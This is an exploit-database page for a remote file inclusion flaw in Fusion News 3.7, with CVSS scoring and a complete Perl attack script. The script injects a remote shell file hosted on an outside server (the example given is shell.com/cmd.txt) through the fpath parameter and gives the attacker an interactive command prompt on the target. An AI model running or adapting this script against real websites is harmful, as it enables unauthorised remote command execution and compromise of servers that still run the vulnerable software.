fusionnews 3,7 Remote File Inclusion

2006.08.22
Credit: Outlaw
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl ########################################################################################### # Aria-Security.net Advisory # # Discovered by: OUTLAW # # < www.Aria-security.net > # # Gr33t to: A.u.r.a & HessamX & Cl0wn & DrtRp # # Special Thanx To All Aria-Security Users # ########################################################################################### use LWP::UserAgent; print "n === Fusion News v3.7 Remote File Inclusionn"; print "n === Discovered by OutLaw .n"; print "n === www.Aria-Security.Netn"; $bPath = $ARGV[0]; $cmdo = $ARGV[1]; $bcmd = $ARGV[2]; if($bPath!~/http:/// || $cmdo!~/http:/// || !$bcmd){usage()} while() { print "[Shell] $"; while(<STDIN>) { $cmd=$_; chomp($cmd); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET =>$bpath.'index.php?fpath='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "n Could not connect !n"; $res = $xpl->request($req); $return = $res->content; $return =~ tr/[n]/[&#234;]/; if (!$cmd) {print "nPlease type a Commandnn"; $return ="";} elsif ($return =~/failed to open stream: HTTP request failed!/) {print "n Could Not Connect to cmd Hostn";exit} elsif ($return =~/^<b>Fatal.error/) {print "n Invalid Commandn"} if($return =~ /(.*)/) { $freturn = $1; $freturn=~ tr/[&#234;]/[n]/; print "rn$freturnnr"; last; } else {print "[Shell] $";}}}last; sub usage() { print " Usage : fusion.pl [host] [cmd shell location] [cmd shell variable]n"; print " Example : fusion.pl http://fusionnews.com http://www.shell.com/cmd.txt cmdn"; exit(); }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top